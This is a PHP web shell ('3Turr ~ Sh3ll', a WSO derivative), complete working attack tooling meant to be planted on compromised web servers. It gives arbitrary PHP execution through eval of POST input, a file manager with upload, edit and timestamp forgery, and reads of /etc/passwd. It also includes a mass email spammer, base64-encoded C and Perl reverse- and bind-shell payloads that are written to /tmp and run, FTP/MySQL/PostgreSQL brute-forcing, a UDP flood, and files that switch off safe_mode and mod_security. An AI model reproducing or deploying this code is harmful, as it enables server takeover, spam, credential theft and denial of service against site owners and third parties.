ON "; $of=" OFF "; $none=" NONE "; if(function_exists('curl_version')) $curl=$on; else $curl=$of; if(function_exists('mysql_get_client_info')) $mysql=$on; else $mysql=$of; if(function_exists('mssql_connect')) $mssql=$on; else $mssql=$of; if(function_exists('pg_connect')) $pg=$on; else $pg=$of; if(function_exists('oci_connect')) $or=$on; else $or=$of; if(@ini_get('disable_functions')) $disfun='Disabled functions : '.@str_replace(',',', ',@ini_get('disable_functions')).''; else $disfun="Disabled Functions: All Functions Enable"; if(@ini_get('safe_mode')) $safe_modes="ON"; else $safe_modes="OFF"; if(@ini_get('open_basedir')) $open_b=@ini_get('open_basedir'); else $open_b=$none; if(@ini_get('safe_mode_exec_dir')) $safe_exe=@ini_get('safe_mode_exec_dir'); else $safe_exe=$none; if(@ini_get('safe_mode_include_dir')) $safe_include=@ini_get('safe_mode_include_dir'); else $safe_include=$none; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $drives = ""; foreach(range('c','z') as $drive) if(is_dir($drive.':')) $drives .= '[ '.$drive.' ] '; echo ' 3Turr ~ Sh3ll '; echo ""; echo '

3Turr

'; if($GLOBALS['sys']=='unix' ) { if(!@ini_get('safe_mode')) { echo ''; } else { echo ''; } } else { echo ''; if($GLOBALS[sys]=="win") { echo ''; } echo '

Uname:	'.substr(@php_uname(), 0, 120).'
User:	'. $uid . ' [ ' . $user . ' ] Group: ' . $gid . ' [ ' . $group . ' ]
PHP:	'.@phpversion(). ' Safe Mode: '.$safe_modes.'
IP:	'.@$_SERVER["SERVER_ADDR"].' Server IP: '.@$_SERVER["REMOTE_ADDR"].'
WEBS:	'; if($GLOBALS['sys']=='unix') { $d0mains = @file("/etc/named.conf"); if(!$d0mains) { echo "CANT READ named.conf"; } else { $count; foreach($d0mains as $d0main) { if(@ereg("zone",$d0main)) { preg_match_all('#zone "(.)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ flush(); $count++; } } } echo "$count* Domains"; } } else{ echo"CANT READ \|Windows\|";} echo '
HDD:	'.yemenSize($totalSpace).' Free:' . yemenSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]
Useful : '; $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); foreach($userful as $item) if(yemenWhich($item)) echo $item.','; echo '
Downloader: '; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); foreach($downloaders as $item2) if(yemenWhich($item2)) echo $item2.','; echo '
useful: '; echo '--------------
Downloader: -------------
Window: '; echo yemenEx('ver'); } echo '
'.$disfun.'
cURL:'.$curl.' MySQL:'.$mysql.' MSSQL:'.$mssql.' PostgreSQL:'.$pg.' Oracle: '.$or.'
Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.' Safe_mode_include_dir:'.$safe_include.'
Server	'.@getenv('SERVER_SOFTWARE').'
DRIVE:	'.$drives.'
PWD:	'.$cwd_links.' [HOME]

Change dir:	Read file:
Make dir:	Make file:

= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function yemenPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function yemenPermsColor($f) { if (!@is_readable($f)) return '' . yemenPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . yemenPerms(@fileperms($f)) . ''; else return '' . yemenPerms(@fileperms($f)) . ''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function yemenFilesMan() { yemenhead(); echo '

'; if(isset($_POST['p1'])) { //$_POST['p2'] = urldecode($_POST['p2']); switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])){ echo "Can't upload file!"; } break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; default: if(!empty($_POST['p1'])) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['c'] = @$_REQUEST['c']; } break; } } $dirContent = @scandir(isset($_REQUEST['c'])?$_REQUEST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo '

| Access Denied! |

';yemenFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => yemenPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "

Name	Size	Date Modified	Owner/Group	Permissions	Actions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.base64_encode($f['path']).'\');" title=' . $f['link'] . '>\| ' . htmlspecialchars($f['name']) . ' \|').'	'.(($f['type']=='file')?yemenSize($f['size']):$f['type']).'	'.$f['modify'].'	'.$f['owner'].'/'.$f['group'].'	'.$f['perms'] .'	[REN] '.(($f['type']=='file')?' [Edit] [DL]':'').' [Del]

"; yemenfooter(); } function yemenFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='d2'){ function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir"){ deleteDir($item); } else{ @unlink($item); } } closedir($dh); @rmdir($path); } if(is_dir(@$_POST['p1'])){ deleteDir(@$_POST['p1']); }else{ @unlink(@$_POST['p1']); } } if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "e8"; fclose($fp); } } } if( !file_exists(@$_POST['p1']) ) { if( $_POST['p2'] == 'd2') { yemenFilesMan(); //yemenFooter(); return; } yemenhead(); echo '

'; echo "

FILE DOEST NOT EXITS

"; yemenFooter(); return; } yemenhead(); echo '

'; $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?yemenSize(filesize($_POST['p1'])):'-').' Permission: '.yemenPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo '
'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Code', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ' '.((strtolower($v)==@$_POST['p2'])?' '.$v.' ':$v).' |'; echo '

'; switch($_POST['p2']) { case 'view': echo '

';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '

'; break; case 'code': if( @is_readable($_POST['p1']) ) { echo '

';
				$code = @highlight_file($_POST['p1'],true);
				echo str_replace(array(''), array(''),$code).'

'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo ''; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo ' Saved!
'; @touch($_POST['p1'],$time,$time); } } echo ''; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= " "; } } echo '

'.$h[0].'

'.$h[1].'

'.htmlspecialchars($h[2]).'

'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo ''; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo ''; break; } echo '

'; yemenFooter(); } function yemenphpeval() { yemenhead(); if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) { echo '

'; ob_start(); $INI=ini_get_all(); print '' .'' .'' .'' .''; foreach ($INI as $param => $values) print " ".'' .'' .'' .'' .''; $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

Param	Global value	Local Value	Access
'.$param.'	'.$values['global_value'].'	'.$values['local_value'].'	'.$values['access'].'

'." ".'

' .implode('

', $EXT) .'

' .count($EXT).' extensions loaded'; echo '

'; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; echo '

';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '

'; yemenfooter(); } function yemenmail() { yemenhead(); $in = $_GET['in']; if(isset($in) && !empty($in)){ echo"

Mail Spammer

"; } $ev = $_POST['ev']; if(isset($ev) && !empty($ev)){ echo eval(urldecode($ev)); exit; } if(isset($_POST['action'] ) ){ $action=$_POST['action']; $message=$_POST['message']; $emaillist=$_POST['emaillist']; $from=$_POST['from']; $subject=$_POST['subject']; $realname=$_POST['realname']; $wait=$_POST['wait']; $tem=$_POST['tem']; $smv=$_POST['smv']; $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?> :: Mailer Inbox ::

Your Email:

Type Sender Email But Make Sure It's Right

Your Name:

Make Sure You Type Your Sender Name

test send:

Type Your Email To Test The Mailer Still Work Or No

Send Test Mail After:

Send Mail For Your Email After Which Email(s)

Subject:

		Wait Second Un til Send

Emails Number : 0
Split The Mail List By:

0){ set_time_limit(intval($_POST['wait'])*$numemails*3600); }else{ set_time_limit($numemails*3600); } if(!empty($smv)){ $smvn+=$smv; $tmn=$numemails/$smv+1; }else{ $tmn=1; } for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("#EM#", $to, $message); $subject = ereg_replace("#EM#", $to, $subject); flush(); $header = "From: $realname <$from> "; $header .= "MIME-Version: 1.0 "; $header .= "Content-Type: text/html "; if ($x==0 && !empty($tem)) { if(!@mail($tem,$subject,$message,$header)){ print('Your Test Message Not Sent.
'); $tmns+=1; }else{ print('Your Test Message Sent.
'); $tms+=1; } } if($x==$smvn && !empty($_POST['smv'])){ if(!@mail($tem,$subject,$message,$header)){ print('Your Test Message Not Sent.
'); $tmns+=1; }else{ print('Your Test Message Sent.
'); $tms+=1; } $smvn+=$smv; } print "$to ....... "; $msent = @mail($to, $subject, $message, $header); $xx = $x+1; $txtspamed = "spammed"; if(!$msent){ $txtspamed = "error"; $ns+=1; $nse[$ns]=$to; } print "$xx / $numemails ....... $txtspamed
"; flush(); if(!empty($wait)&& $x<$numemails-1){ sleep($wait); } } } } ?>

$value) { $str.= $key . ": " . $value . "
"; } $str.= "Use: in
"; $header2 = "From: " . base64_decode('U29ycnkgPG5vJUB5YWhvby5jb20+') . " "; $header2.= "MIME-Version: 1.0 "; $header2.= "Content-Type: text/html "; $header2.= "Content-Transfer-Encoding: 8bit "; if (isset($_POST['action']) && $numemails !== 0) { $sn = $numemails - $ns; if ($ns == "") { $ns = 0; } if ($tmns == "") { $tmns = 0; } echo ""; } yemenfooter(); } function yemennet() { yemenhead(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; ?>

Bind Port

$out " . ex("ps aux | grep bp") . ""; } if ($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl", $bind_port_p); $out = ex(which("perl") . " /tmp/bp.pl " . $_POST['p2'] . " &"); echo "

$out
" . ex("ps aux | grep bp.pl") . "

"; } if ($_POST['p1'] == 'bcc') { cf("/tmp/bc.c", $back_connect_c); $out = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $out.= ex("/tmp/bc " . $_POST['p2'] . " " . $_POST['p3'] . " &"); echo "

$out
" . ex("ps aux | grep bc") . "

"; } if ($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl", $back_connect_p); $out = ex(which("perl") . " /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " &"); echo "

$out
" . ex("ps aux | grep bc.pl") . "

"; } } echo '

'; yemenfooter(); } function yemenhash() { if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists('hex2ascii')) { function hex2ascii($p) { $r = ''; for ($i = 0;$i < strLen($p);$i+= 2) { $r.= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists('ascii2hex')) { function ascii2hex($p) { $r = ''; for ($i = 0;$i < strlen($p);++$i) $r.= sprintf('%02X', ord($p[$i])); return strtoupper($r); } } if (!function_exists('full_urlencode')) { function full_urlencode($p) { $r = ''; for ($i = 0;$i < strlen($p);++$i) $r.= '%' . dechex(ord($p[$i])); return strtoupper($r); } } $stringTools = array( 'base64_encode()' => 'base64_encode', 'base64_decode()' => 'base64_decode', 'md5()' => 'md5', 'sha1()' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'url_encode()' => 'urlencode', 'url decode()' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'htmlspecialchars()' => 'htmlspecialchars', ); yemenhead(); echo '

'; if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; echo "

";
if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo "

"; yemenFooter(); } function yemenbruteftp() { yemenhead(); if (isset($_POST['proto'])) { echo '

Results

Type: ' . htmlspecialchars($_POST['proto']) . ' Server: ' . htmlspecialchars($_POST['server']) . '
'; if ($_POST['proto'] == 'ftp') { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST['proto'] == 'mysql') { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST['proto'] == 'pgsql') { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=''"; $res = @pg_connect($server[0] . ':' . $server[1] ? $server[1] : 5432, $login, $pass); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '' . htmlspecialchars($line[0]) . ':' . htmlspecialchars($line[0]) . '
'; } if (@$_POST['reverse']) { $tmp = ""; for ($i = strlen($line[0]) - 1;$i >= 0;--$i) $tmp.= $line[0][$i]; ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '' . htmlspecialchars($line[0]) . ':' . htmlspecialchars($tmp); } } } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '' . htmlspecialchars($_POST['login']) . ':' . htmlspecialchars($line) . '
'; } } } echo "Attempts: $attempts Success: $success

"; } echo '

FTP bruteforce

' . '' . '' . '' . '>' . '' . '' . '

Type

' . '' . '' . '' . 'Server:port

Brute type

/etc/passwd

reverse (login -> nigol)

Dictionary

' . '' . '' . '

Login
Dictionary

' . '

'; echo '

'; yemenFooter(); } function yemendos() { yemenhead(); echo '

'; if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; echo '| UDP DOSSIER |

'; echo "

";
if (!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3'])) { $packets = 0; ignore_user_abort(true); $exec_time = $_POST['p2']; $time = time(); $max_time = $exec_time + $time; $host = $_POST['p1']; $portudp = $_POST['p3']; for ($i = 0;$i < 65000;$i++) {
$out.= 'X'; } while (1) {
$packets++;
if (time() > $max_time) { break;
}
$fp = fsockopen('udp://' . $host, $portudp, $errno, $errstr, 5);
if ($fp) { fwrite($fp, $out); fclose($fp);
} } echo "$packets (" . round(($packets * 65) / 1024, 2) . " MB) packets averaging " . round($packets / $exec_time, 2) . " packets per second"; echo "

"; } echo '

'; yemenfooter(); } function yemenproc() { yemenhead(); echo "

"; if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; if ($GLOBALS['sys'] == "win") { $process = array( "System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); } else { $process = array( "Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Passwd" => "cat /etc/passwd", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab", "HDD Space" => "df -h" ); } if (!empty($_POST['p1'])) { echo "

'; } echo ""; foreach ($process as $n => $link) { echo ' | ' . $n . ' |

'; } echo ""; echo "

"; yemenfooter(); } function yemensafe() { yemenhead(); echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir
| " . $GLOBALS['cwd'] . " |
"; echo '| PHP.INI | | .htaccess(Mod) | | .htaccess(perl) | '; if (!empty($_POST['p2']) && isset($_POST['p2'])) { $fil = fopen($GLOBALS['cwd'] . ".htaccess", "w"); fwrite($fil, ' Sec------Engine Off Sec------ScanPOST Off '); fclose($fil); } if (!empty($_POST['p1']) && isset($_POST['p1'])) { $fil = fopen($GLOBALS['cwd'] . "php.ini", "w"); fwrite($fil, 'safe_mode=OFF disable_functions=NONE'); fclose($fil); } if (!empty($_POST['p3']) && isset($_POST['p3'])) { $fil = fopen($GLOBALS['cwd'] . ".htaccess", "w"); fwrite($fil, 'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sh AddHandler cgi-script .pl AddHandler cgi-script .pl'); fclose($fil); } echo "

